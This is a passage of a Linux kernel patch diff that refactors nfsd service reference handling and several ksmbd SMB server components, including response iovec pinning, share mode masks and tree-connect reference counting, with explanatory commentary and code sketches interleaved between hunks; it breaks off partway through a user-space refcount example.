+- * the kref.  So do all the work when kref_put returns true.
+- */
+-static void nfsd_noop(struct kref *ref)
+-{
+-}
+-
+-void nfsd_put(struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-
+-	if (kref_put(&nn->nfsd_serv->sv_refcnt, nfsd_noop)) {
+-		svc_xprt_destroy_all(nn->nfsd_serv, net);
+-		nfsd_last_thread(nn->nfsd_serv, net);
+-		svc_destroy(&nn->nfsd_serv->sv_refcnt);
+-		spin_lock(&nfsd_notifier_lock);
+-		nn->nfsd_serv = NULL;
+-		spin_unlock(&nfsd_notifier_lock);
+-	}
+-}
+-
+ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ {
+ 	int i = 0;
+@@ -773,7 +755,7 @@ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ 		if (err)
+ 			break;
+ 	}
+-	nfsd_put(net);
++	svc_put(nn->nfsd_serv);
+ 	return err;
+ }
+ 
+@@ -788,6 +770,7 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 	int	error;
+ 	bool	nfsd_up_before;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	mutex_lock(&nfsd_mutex);
+ 	dprintk("nfsd: creating service\n");
+@@ -807,22 +790,25 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 		goto out;
+ 
+ 	nfsd_up_before = nn->nfsd_net_up;
++	serv = nn->nfsd_serv;
+ 
+ 	error = nfsd_startup_net(net, cred);
+ 	if (error)
+ 		goto out_put;
+-	error = svc_set_num_threads(nn->nfsd_serv, NULL, nrservs);
++	error = svc_set_num_threads(serv, NULL, nrservs);
+ 	if (error)
+ 		goto out_shutdown;
+-	error = nn->nfsd_serv->sv_nrthreads;
++	error = serv->sv_nrthreads;
++	if (error == 0)
++		nfsd_last_thread(net);
+ out_shutdown:
+ 	if (error < 0 && !nfsd_up_before)
+ 		nfsd_shutdown_net(net);
+ out_put:
+ 	/* Threads now hold service active */
+ 	if (xchg(&nn->keep_active, 0))
+-		nfsd_put(net);
+-	nfsd_put(net);
++		svc_put(serv);
++	svc_put(serv);
+ out:
+ 	mutex_unlock(&nfsd_mutex);
+ 	return error;
+@@ -1138,11 +1124,12 @@ int nfsd_pool_stats_open(struct inode *inode, struct file *file)
+ 
+ int nfsd_pool_stats_release(struct inode *inode, struct file *file)
+ {
++	struct seq_file *seq = file->private_data;
++	struct svc_serv *serv = seq->private;
+ 	int ret = seq_release(inode, file);
+-	struct net *net = inode->i_sb->s_fs_info;
+ 
+ 	mutex_lock(&nfsd_mutex);
+-	nfsd_put(net);
++	svc_put(serv);
+ 	mutex_unlock(&nfsd_mutex);
+ 	return ret;
+ }
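+
+With nfsd_put() reduced to a plain svc_put() wrapper, the old kref_put(..., nfsd_noop) trick is gone and teardown becomes explicit: whoever observes the thread count hit zero calls nfsd_last_thread(), which clears nn->nfsd_serv under nfsd_notifier_lock and destroys the transports before the final reference is dropped. A sketch of the ordering the patch enforces, mirroring the nfsd_shutdown_threads() hunk above (caller holds nfsd_mutex):
+
+	struct svc_serv *serv = nn->nfsd_serv;
+
+	svc_get(serv);				/* keep serv alive across teardown */
+	svc_set_num_threads(serv, NULL, 0);	/* kill the nfsd threads */
+	nfsd_last_thread(net);			/* clear nn->nfsd_serv, destroy xprts */
+	svc_put(serv);				/* drop our temporary reference */
+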
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index c8a4014f9d395..07549957b3099 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -1196,6 +1196,7 @@ struct create_posix {
+ #define SMB2_LEASE_WRITE_CACHING_LE		cpu_to_le32(0x04)
+ 
+ #define SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE	cpu_to_le32(0x02)
++#define SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE	cpu_to_le32(0x04)
+ 
+ #define SMB2_LEASE_KEY_SIZE			16
+ 
+diff --git a/fs/smb/server/Kconfig b/fs/smb/server/Kconfig
+index e1fe17747ed69..d036ab80fec35 100644
+--- a/fs/smb/server/Kconfig
++++ b/fs/smb/server/Kconfig
+@@ -1,5 +1,5 @@
+ config SMB_SERVER
+-	tristate "SMB3 server support (EXPERIMENTAL)"
++	tristate "SMB3 server support"
+ 	depends on INET
+ 	depends on MULTIUSER
+ 	depends on FILE_LOCKING
+@@ -33,14 +33,16 @@ config SMB_SERVER
+ 	  in ksmbd-tools, available from
+ 	  https://github.com/cifsd-team/ksmbd-tools.
+ 	  More detail about how to run the ksmbd kernel server is
+-	  available via README file
++	  available via the README file
+ 	  (https://github.com/cifsd-team/ksmbd-tools/blob/master/README).
+ 
+ 	  ksmbd kernel server includes support for auto-negotiation,
+ 	  Secure negotiate, Pre-authentication integrity, oplock/lease,
+ 	  compound requests, multi-credit, packet signing, RDMA(smbdirect),
+ 	  smb3 encryption, copy-offload, secure per-user session
+-	  establishment via NTLM or NTLMv2.
++	  establishment via Kerberos or NTLMv2.
++
++if SMB_SERVER
+ 
+ config SMB_SERVER_SMBDIRECT
+ 	bool "Support for SMB Direct protocol"
+@@ -54,6 +56,8 @@ config SMB_SERVER_SMBDIRECT
+ 	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
+ 	  say N.
+ 
++endif
++
+ config SMB_SERVER_CHECK_CAP_NET_ADMIN
+ 	bool "Enable check network administration capability"
+ 	depends on SMB_SERVER
+diff --git a/fs/smb/server/asn1.c b/fs/smb/server/asn1.c
+index c03eba0903682..4a4b2b03ff33d 100644
+--- a/fs/smb/server/asn1.c
++++ b/fs/smb/server/asn1.c
+@@ -208,32 +208,29 @@ int ksmbd_neg_token_init_mech_type(void *context, size_t hdrlen,
+ 	return 0;
+ }
+ 
+-int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
+-				    unsigned char tag, const void *value,
+-				    size_t vlen)
++static int ksmbd_neg_token_alloc(void *context, size_t hdrlen,
++				 unsigned char tag, const void *value,
++				 size_t vlen)
+ {
+ 	struct ksmbd_conn *conn = context;
+ 
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
++	conn->mechToken = kmemdup_nul(value, vlen, GFP_KERNEL);
+ 	if (!conn->mechToken)
+ 		return -ENOMEM;
+ 
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+ 	return 0;
+ }
+ 
+-int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
++int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
+ 				    unsigned char tag, const void *value,
+ 				    size_t vlen)
+ {
+-	struct ksmbd_conn *conn = context;
+-
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
+-	if (!conn->mechToken)
+-		return -ENOMEM;
++	return ksmbd_neg_token_alloc(context, hdrlen, tag, value, vlen);
++}
+ 
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+-	return 0;
++int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
++				    unsigned char tag, const void *value,
++				    size_t vlen)
++{
++	return ksmbd_neg_token_alloc(context, hdrlen, tag, value, vlen);
+ }
+diff --git a/fs/smb/server/auth.c b/fs/smb/server/auth.c
+index 15e5684e328c1..229a6527870d0 100644
+--- a/fs/smb/server/auth.c
++++ b/fs/smb/server/auth.c
+@@ -1032,11 +1032,15 @@ static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+ {
+ 	struct scatterlist *sg;
+ 	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int i, nr_entries[3] = {0}, total_entries = 0, sg_idx = 0;
++	int i, *nr_entries, total_entries = 0, sg_idx = 0;
+ 
+ 	if (!nvec)
+ 		return NULL;
+ 
++	nr_entries = kcalloc(nvec, sizeof(int), GFP_KERNEL);
++	if (!nr_entries)
++		return NULL;
++
+ 	for (i = 0; i < nvec - 1; i++) {
+ 		unsigned long kaddr = (unsigned long)iov[i + 1].iov_base;
+ 
+@@ -1054,8 +1058,10 @@ static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+ 	total_entries += 2;
+ 
+ 	sg = kmalloc_array(total_entries, sizeof(struct scatterlist), GFP_KERNEL);
+-	if (!sg)
++	if (!sg) {
++		kfree(nr_entries);
+ 		return NULL;
++	}
+ 
+ 	sg_init_table(sg, total_entries);
+ 	smb2_sg_set_buf(&sg[sg_idx++], iov[0].iov_base + 24, assoc_data_len);
+@@ -1089,6 +1095,7 @@ static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+ 		}
+ 	}
+ 	smb2_sg_set_buf(&sg[sg_idx], sign, SMB2_SIGNATURE_SIZE);
++	kfree(nr_entries);
+ 	return sg;
+ }
+ 
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index ff97cad8d5b45..b6fa1e285c401 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -114,10 +114,8 @@ void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct list_head *requests_queue = NULL;
+ 
+-	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE) {
++	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE)
+ 		requests_queue = &conn->requests;
+-		work->syncronous = true;
+-	}
+ 
+ 	if (requests_queue) {
+ 		atomic_inc(&conn->req_running);
+@@ -127,28 +125,22 @@ void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
+ 	}
+ }
+ 
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
++void ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	int ret = 1;
+ 
+ 	if (list_empty(&work->request_entry) &&
+ 	    list_empty(&work->async_request_entry))
+-		return 0;
++		return;
+ 
+-	if (!work->multiRsp)
+-		atomic_dec(&conn->req_running);
++	atomic_dec(&conn->req_running);
+ 	spin_lock(&conn->request_lock);
+-	if (!work->multiRsp) {
+-		list_del_init(&work->request_entry);
+-		if (work->syncronous == false)
+-			list_del_init(&work->async_request_entry);
+-		ret = 0;
+-	}
++	list_del_init(&work->request_entry);
+ 	spin_unlock(&conn->request_lock);
++	if (work->asynchronous)
++		release_async_work(work);
+ 
+ 	wake_up_all(&conn->req_running_q);
+-	return ret;
+ }
+ 
+ void ksmbd_conn_lock(struct ksmbd_conn *conn)
+@@ -175,63 +167,31 @@ void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+ 
+ void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
+ {
+-	struct ksmbd_conn *bind_conn;
+-
+ 	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(bind_conn, &conn_list, conns_list) {
+-		if (bind_conn == conn)
+-			continue;
+-
+-		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
+-		    !ksmbd_conn_releasing(bind_conn) &&
+-		    atomic_read(&bind_conn->req_running)) {
+-			wait_event(bind_conn->req_running_q,
+-				atomic_read(&bind_conn->req_running) == 0);
+-		}
+-	}
+-	up_read(&conn_list_lock);
+ }
+ 
+ int ksmbd_conn_write(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	size_t len = 0;
+ 	int sent;
+-	struct kvec iov[3];
+-	int iov_idx = 0;
+ 
+ 	if (!work->response_buf) {
+ 		pr_err("NULL response header\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	if (work->tr_buf) {
+-		iov[iov_idx] = (struct kvec) { work->tr_buf,
+-				sizeof(struct smb2_transform_hdr) + 4 };
+-		len += iov[iov_idx++].iov_len;
+-	}
++	if (work->send_no_response)
++		return 0;
+ 
+-	if (work->aux_payload_sz) {
+-		iov[iov_idx] = (struct kvec) { work->response_buf, work->resp_hdr_sz };
+-		len += iov[iov_idx++].iov_len;
+-		iov[iov_idx] = (struct kvec) { work->aux_payload_buf, work->aux_payload_sz };
+-		len += iov[iov_idx++].iov_len;
+-	} else {
+-		if (work->tr_buf)
+-			iov[iov_idx].iov_len = work->resp_hdr_sz;
+-		else
+-			iov[iov_idx].iov_len = get_rfc1002_len(work->response_buf) + 4;
+-		iov[iov_idx].iov_base = work->response_buf;
+-		len += iov[iov_idx++].iov_len;
+-	}
++	if (!work->iov_idx)
++		return -EINVAL;
+ 
+ 	ksmbd_conn_lock(conn);
+-	sent = conn->transport->ops->writev(conn->transport, &iov[0],
+-					iov_idx, len,
+-					work->need_invalidate_rkey,
+-					work->remote_key);
++	sent = conn->transport->ops->writev(conn->transport, work->iov,
++			work->iov_cnt,
++			get_rfc1002_len(work->iov[0].iov_base) + 4,
++			work->need_invalidate_rkey,
++			work->remote_key);
+ 	ksmbd_conn_unlock(conn);
+ 
+ 	if (sent < 0) {
+@@ -345,7 +305,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
+ 
+ 		if (pdu_size > max_allowed_pdu_size) {
+-			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
++			pr_err_ratelimited("PDU length(%u) exceeded maximum allowed pdu size(%u) on connection(%d)\n",
+ 					pdu_size, max_allowed_pdu_size,
+ 					READ_ONCE(conn->status));
+ 			break;
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+index 335fdd714d595..3c005246a32e8 100644
+--- a/fs/smb/server/connection.h
++++ b/fs/smb/server/connection.h
+@@ -159,7 +159,7 @@ int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
+ 			  struct smb2_buffer_desc_v1 *desc,
+ 			  unsigned int desc_len);
+ void ksmbd_conn_enqueue_request(struct ksmbd_work *work);
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
++void ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
+ void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+ int ksmbd_conn_handler_loop(void *p);
+ int ksmbd_conn_transport_init(void);
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+index ce866ff159bfe..b7521e41402e0 100644
+--- a/fs/smb/server/ksmbd_netlink.h
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -74,6 +74,7 @@ struct ksmbd_heartbeat {
+ #define KSMBD_GLOBAL_FLAG_SMB2_LEASES		BIT(0)
+ #define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION	BIT(1)
+ #define KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL	BIT(2)
++#define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION_OFF	BIT(3)
+ 
+ /*
+  * IPC request for ksmbd server startup
+@@ -351,7 +352,8 @@ enum KSMBD_TREE_CONN_STATUS {
+ #define KSMBD_SHARE_FLAG_STREAMS		BIT(11)
+ #define KSMBD_SHARE_FLAG_FOLLOW_SYMLINKS	BIT(12)
+ #define KSMBD_SHARE_FLAG_ACL_XATTR		BIT(13)
+-#define KSMBD_SHARE_FLAG_UPDATE		BIT(14)
++#define KSMBD_SHARE_FLAG_UPDATE			BIT(14)
++#define KSMBD_SHARE_FLAG_CROSSMNT		BIT(15)
+ 
+ /*
+  * Tree connect request flags.
+diff --git a/fs/smb/server/ksmbd_work.c b/fs/smb/server/ksmbd_work.c
+index 14b9caebf7a4f..d7c676c151e20 100644
+--- a/fs/smb/server/ksmbd_work.c
++++ b/fs/smb/server/ksmbd_work.c
+@@ -27,18 +27,38 @@ struct ksmbd_work *ksmbd_alloc_work_struct(void)
+ 		INIT_LIST_HEAD(&work->async_request_entry);
+ 		INIT_LIST_HEAD(&work->fp_entry);
+ 		INIT_LIST_HEAD(&work->interim_entry);
++		INIT_LIST_HEAD(&work->aux_read_list);
++		work->iov_alloc_cnt = 4;
++		work->iov = kcalloc(work->iov_alloc_cnt, sizeof(struct kvec),
++				    GFP_KERNEL);
++		if (!work->iov) {
++			kmem_cache_free(work_cache, work);
++			work = NULL;
++		}
+ 	}
+ 	return work;
+ }
+ 
+ void ksmbd_free_work_struct(struct ksmbd_work *work)
+ {
++	struct aux_read *ar, *tmp;
++
+ 	WARN_ON(work->saved_cred != NULL);
+ 
+ 	kvfree(work->response_buf);
+-	kvfree(work->aux_payload_buf);
++
++	list_for_each_entry_safe(ar, tmp, &work->aux_read_list, entry) {
++		kvfree(ar->buf);
++		list_del(&ar->entry);
++		kfree(ar);
++	}
++
+ 	kfree(work->tr_buf);
+ 	kvfree(work->request_buf);
++	kfree(work->iov);
++	if (!list_empty(&work->interim_entry))
++		list_del(&work->interim_entry);
++
+ 	if (work->async_id)
+ 		ksmbd_release_id(&work->conn->async_ida, work->async_id);
+ 	kmem_cache_free(work_cache, work);
+@@ -77,3 +97,81 @@ bool ksmbd_queue_work(struct ksmbd_work *work)
+ {
+ 	return queue_work(ksmbd_wq, &work->work);
+ }
++
++static inline void __ksmbd_iov_pin(struct ksmbd_work *work, void *ib,
++				   unsigned int ib_len)
++{
++	work->iov[++work->iov_idx].iov_base = ib;
++	work->iov[work->iov_idx].iov_len = ib_len;
++	work->iov_cnt++;
++}
++
++static int __ksmbd_iov_pin_rsp(struct ksmbd_work *work, void *ib, int len,
++			       void *aux_buf, unsigned int aux_size)
++{
++	struct aux_read *ar = NULL;
++	int need_iov_cnt = 1;
++
++	if (aux_size) {
++		need_iov_cnt++;
++		ar = kmalloc(sizeof(struct aux_read), GFP_KERNEL);
++		if (!ar)
++			return -ENOMEM;
++	}
++
++	if (work->iov_alloc_cnt < work->iov_cnt + need_iov_cnt) {
++		struct kvec *new;
++
++		work->iov_alloc_cnt += 4;
++		new = krealloc(work->iov,
++			       sizeof(struct kvec) * work->iov_alloc_cnt,
++			       GFP_KERNEL | __GFP_ZERO);
++		if (!new) {
++			kfree(ar);
++			work->iov_alloc_cnt -= 4;
++			return -ENOMEM;
++		}
++		work->iov = new;
++	}
++
++	/* Plus rfc_length size on first iov */
++	if (!work->iov_idx) {
++		work->iov[work->iov_idx].iov_base = work->response_buf;
++		*(__be32 *)work->iov[0].iov_base = 0;
++		work->iov[work->iov_idx].iov_len = 4;
++		work->iov_cnt++;
++	}
++
++	__ksmbd_iov_pin(work, ib, len);
++	inc_rfc1001_len(work->iov[0].iov_base, len);
++
++	if (aux_size) {
++		__ksmbd_iov_pin(work, aux_buf, aux_size);
++		inc_rfc1001_len(work->iov[0].iov_base, aux_size);
++
++		ar->buf = aux_buf;
++		list_add(&ar->entry, &work->aux_read_list);
++	}
++
++	return 0;
++}
++
++int ksmbd_iov_pin_rsp(struct ksmbd_work *work, void *ib, int len)
++{
++	return __ksmbd_iov_pin_rsp(work, ib, len, NULL, 0);
++}
++
++int ksmbd_iov_pin_rsp_read(struct ksmbd_work *work, void *ib, int len,
++			   void *aux_buf, unsigned int aux_size)
++{
++	return __ksmbd_iov_pin_rsp(work, ib, len, aux_buf, aux_size);
++}
++
++int allocate_interim_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
++	if (!work->response_buf)
++		return -ENOMEM;
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++	return 0;
++}
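+
+These helpers replace the fixed three-kvec scheme that ksmbd_conn_write() used to build by hand: each response chunk is appended to a growable kvec array, iov[0] always carries the 4-byte RFC 1002 length that the pin calls keep current via inc_rfc1001_len(), and an auxiliary read payload is parked on work->aux_read_list so ksmbd_free_work_struct() can release it. A hedged usage sketch from a hypothetical command handler:
+
+	static int example_send_read_rsp(struct ksmbd_work *work,
+					 void *rsp, int hdr_len,
+					 void *data_buf, unsigned int nbytes)
+	{
+		int err;
+
+		if (!nbytes)		/* header-only response */
+			return ksmbd_iov_pin_rsp(work, rsp, hdr_len);
+
+		/*
+		 * Header plus separately allocated payload; on success,
+		 * ownership of data_buf passes to the work struct via
+		 * aux_read_list.
+		 */
+		err = ksmbd_iov_pin_rsp_read(work, rsp, hdr_len, data_buf, nbytes);
+		if (err)
+			kvfree(data_buf);	/* pin failed, still ours to free */
+		return err;
+	}
+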
+diff --git a/fs/smb/server/ksmbd_work.h b/fs/smb/server/ksmbd_work.h
+index 5ece58e40c979..8ca2c813246e6 100644
+--- a/fs/smb/server/ksmbd_work.h
++++ b/fs/smb/server/ksmbd_work.h
+@@ -19,6 +19,11 @@ enum {
+ 	KSMBD_WORK_CLOSED,
+ };
+ 
++struct aux_read {
++	void *buf;
++	struct list_head entry;
++};
++
+ /* one of these for every pending CIFS request at the connection */
+ struct ksmbd_work {
+ 	/* Server corresponding to this mid */
+@@ -31,13 +36,19 @@ struct ksmbd_work {
+ 	/* Response buffer */
+ 	void                            *response_buf;
+ 
+-	/* Read data buffer */
+-	void                            *aux_payload_buf;
++	struct list_head		aux_read_list;
++
++	struct kvec			*iov;
++	int				iov_alloc_cnt;
++	int				iov_cnt;
++	int				iov_idx;
+ 
+ 	/* Next cmd hdr in compound req buf*/
+ 	int                             next_smb2_rcv_hdr_off;
+ 	/* Next cmd hdr in compound rsp buf*/
+ 	int                             next_smb2_rsp_hdr_off;
++	/* Current cmd hdr in compound rsp buf*/
++	int                             curr_smb2_rsp_hdr_off;
+ 
+ 	/*
+ 	 * Current Local FID assigned compound response if SMB2 CREATE
+@@ -53,22 +64,17 @@ struct ksmbd_work {
+ 	unsigned int			credits_granted;
+ 
+ 	/* response smb header size */
+-	unsigned int                    resp_hdr_sz;
+ 	unsigned int                    response_sz;
+-	/* Read data count */
+-	unsigned int                    aux_payload_sz;
+ 
+ 	void				*tr_buf;
+ 
+ 	unsigned char			state;
+-	/* Multiple responses for one request e.g. SMB ECHO */
+-	bool                            multiRsp:1;
+ 	/* No response for cancelled request */
+ 	bool                            send_no_response:1;
+ 	/* Request is encrypted */
+ 	bool                            encrypted:1;
+ 	/* Is this SYNC or ASYNC ksmbd_work */
+-	bool                            syncronous:1;
++	bool                            asynchronous:1;
+ 	bool                            need_invalidate_rkey:1;
+ 
+ 	unsigned int                    remote_key;
+@@ -95,6 +101,15 @@ static inline void *ksmbd_resp_buf_next(struct ksmbd_work *work)
+ 	return work->response_buf + work->next_smb2_rsp_hdr_off + 4;
+ }
+ 
++/**
++ * ksmbd_resp_buf_curr - Get current buffer on compound response.
++ * @work: smb work containing response buffer
++ */
++static inline void *ksmbd_resp_buf_curr(struct ksmbd_work *work)
++{
++	return work->response_buf + work->curr_smb2_rsp_hdr_off + 4;
++}
++
+ /**
+  * ksmbd_req_buf_next - Get next buffer on compound request.
+  * @work: smb work containing response buffer
+@@ -113,5 +128,8 @@ int ksmbd_work_pool_init(void);
+ int ksmbd_workqueue_init(void);
+ void ksmbd_workqueue_destroy(void);
+ bool ksmbd_queue_work(struct ksmbd_work *work);
+-
++int ksmbd_iov_pin_rsp_read(struct ksmbd_work *work, void *ib, int len,
++			   void *aux_buf, unsigned int aux_size);
++int ksmbd_iov_pin_rsp(struct ksmbd_work *work, void *ib, int len);
++int allocate_interim_rsp_buf(struct ksmbd_work *work);
+ #endif /* __KSMBD_WORK_H__ */
+diff --git a/fs/smb/server/mgmt/share_config.h b/fs/smb/server/mgmt/share_config.h
+index 3fd3382939421..5f591751b9236 100644
+--- a/fs/smb/server/mgmt/share_config.h
++++ b/fs/smb/server/mgmt/share_config.h
+@@ -34,29 +34,22 @@ struct ksmbd_share_config {
+ #define KSMBD_SHARE_INVALID_UID	((__u16)-1)
+ #define KSMBD_SHARE_INVALID_GID	((__u16)-1)
+ 
+-static inline int share_config_create_mode(struct ksmbd_share_config *share,
+-					   umode_t posix_mode)
++static inline umode_t
++share_config_create_mode(struct ksmbd_share_config *share,
++			 umode_t posix_mode)
+ {
+-	if (!share->force_create_mode) {
+-		if (!posix_mode)
+-			return share->create_mask;
+-		else
+-			return posix_mode & share->create_mask;
+-	}
+-	return share->force_create_mode & share->create_mask;
++	umode_t mode = (posix_mode ?: (umode_t)-1) & share->create_mask;
++
++	return mode | share->force_create_mode;
+ }
+ 
+-static inline int share_config_directory_mode(struct ksmbd_share_config *share,
+-					      umode_t posix_mode)
++static inline umode_t
++share_config_directory_mode(struct ksmbd_share_config *share,
++			    umode_t posix_mode)
+ {
+-	if (!share->force_directory_mode) {
+-		if (!posix_mode)
+-			return share->directory_mask;
+-		else
+-			return posix_mode & share->directory_mask;
+-	}
++	umode_t mode = (posix_mode ?: (umode_t)-1) & share->directory_mask;
+ 
+-	return share->force_directory_mode & share->directory_mask;
++	return mode | share->force_directory_mode;
+ }
+ 
+ static inline int test_share_config_flag(struct ksmbd_share_config *share,
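+
+The refactor collapses both branches into one expression: a posix_mode of 0 falls back to (umode_t)-1 so the mask alone applies, and the force_* bits are now OR'ed on top of the masked mode instead of replacing it. Worked through with example share settings (create_mask = 0744, force_create_mode = 0600):
+
+	/* share_config_create_mode(), example values only */
+	posix_mode = 0:		((umode_t)-1 & 0744) | 0600 = 0744 | 0600 = 0744
+	posix_mode = 0666:	(0666 & 0744) | 0600 = 0644 | 0600 = 0644
+	posix_mode = 0100:	(0100 & 0744) | 0600 = 0100 | 0600 = 0700
+
+Under the old code a set force mode discarded posix_mode entirely; the new code guarantees the forced bits while still honouring the client's mode within the mask.
+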
+diff --git a/fs/smb/server/mgmt/tree_connect.c b/fs/smb/server/mgmt/tree_connect.c
+index f07a05f376513..d2c81a8a11dda 100644
+--- a/fs/smb/server/mgmt/tree_connect.c
++++ b/fs/smb/server/mgmt/tree_connect.c
+@@ -73,7 +73,10 @@ ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 
+ 	tree_conn->user = sess->user;
+ 	tree_conn->share_conf = sc;
++	tree_conn->t_state = TREE_NEW;
+ 	status.tree_conn = tree_conn;
++	atomic_set(&tree_conn->refcount, 1);
++	init_waitqueue_head(&tree_conn->refcount_q);
+ 
+ 	ret = xa_err(xa_store(&sess->tree_conns, tree_conn->id, tree_conn,
+ 			      GFP_KERNEL));
+@@ -93,14 +96,33 @@ out_error:
+ 	return status;
+ }
+ 
++void ksmbd_tree_connect_put(struct ksmbd_tree_connect *tcon)
++{
++	/*
++	 * Check the waitqueue before releasing the tree connect on
++	 * tree disconnect. waitqueue_active() is safe here because
++	 * the wait condition is checked with an atomic operation.
++	 */
++	if (!atomic_dec_return(&tcon->refcount) &&
++	    waitqueue_active(&tcon->refcount_q))
++		wake_up(&tcon->refcount_q);
++}
++
+ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ 			       struct ksmbd_tree_connect *tree_conn)
+ {
+ 	int ret;
+ 
++	write_lock(&sess->tree_conns_lock);
++	xa_erase(&sess->tree_conns, tree_conn->id);
++	write_unlock(&sess->tree_conns_lock);
++
++	if (!atomic_dec_and_test(&tree_conn->refcount))
++		wait_event(tree_conn->refcount_q,
++			   atomic_read(&tree_conn->refcount) == 0);
++
+ 	ret = ksmbd_ipc_tree_disconnect_request(sess->id, tree_conn->id);
+ 	ksmbd_release_tree_conn_id(sess, tree_conn->id);
+-	xa_erase(&sess->tree_conns, tree_conn->id);
+ 	ksmbd_share_config_put(tree_conn->share_conf);
+ 	kfree(tree_conn);
+ 	return ret;
+@@ -111,26 +133,19 @@ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ {
+ 	struct ksmbd_tree_connect *tcon;
+ 
++	read_lock(&sess->tree_conns_lock);
+ 	tcon = xa_load(&sess->tree_conns, id);
+ 	if (tcon) {
+-		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++		if (tcon->t_state != TREE_CONNECTED)
++			tcon = NULL;
++		else if (!atomic_inc_not_zero(&tcon->refcount))
+ 			tcon = NULL;
+ 	}
++	read_unlock(&sess->tree_conns_lock);
+ 
+ 	return tcon;
+ }
+ 
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id)
+-{
+-	struct ksmbd_tree_connect *tc;
+-
+-	tc = ksmbd_tree_conn_lookup(sess, id);
+-	if (tc)
+-		return tc->share_conf;
+-	return NULL;
+-}
+-
+ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ {
+ 	int ret = 0;
+@@ -140,8 +155,18 @@ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ 	if (!sess)
+ 		return -EINVAL;
+ 
+-	xa_for_each(&sess->tree_conns, id, tc)
++	xa_for_each(&sess->tree_conns, id, tc) {
++		write_lock(&sess->tree_conns_lock);
++		if (tc->t_state == TREE_DISCONNECTED) {
++			write_unlock(&sess->tree_conns_lock);
++			ret = -ENOENT;
++			continue;
++		}
++		tc->t_state = TREE_DISCONNECTED;
++		write_unlock(&sess->tree_conns_lock);
++
+ 		ret |= ksmbd_tree_conn_disconnect(sess, tc);
++	}
+ 	xa_destroy(&sess->tree_conns);
+ 	return ret;
+ }
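
ksmbd_tree_conn_disconnect() now unpublishes the entry first, drops the table's reference, and sleeps on refcount_q until every lookup that grabbed a reference has called ksmbd_tree_connect_put(). The same lifetime pattern can be sketched in user space with C11 atomics and a condition variable standing in for the kernel waitqueue; all names below are illustrative (build with cc -pthread):

#include <pthread.h>
#include <stdatomic.h>
#include <unistd.h>

struct obj {
	atomic_int refcount;                 /* starts at 1: the table's ref */
	pthread_mutex_t lock;
	pthread_cond_t released;
};

static void obj_put(struct obj *o)           /* lookup side drops its ref */
{
	if (atomic_fetch_sub(&o->refcount, 1) == 1) {
		pthread_mutex_lock(&o->lock);
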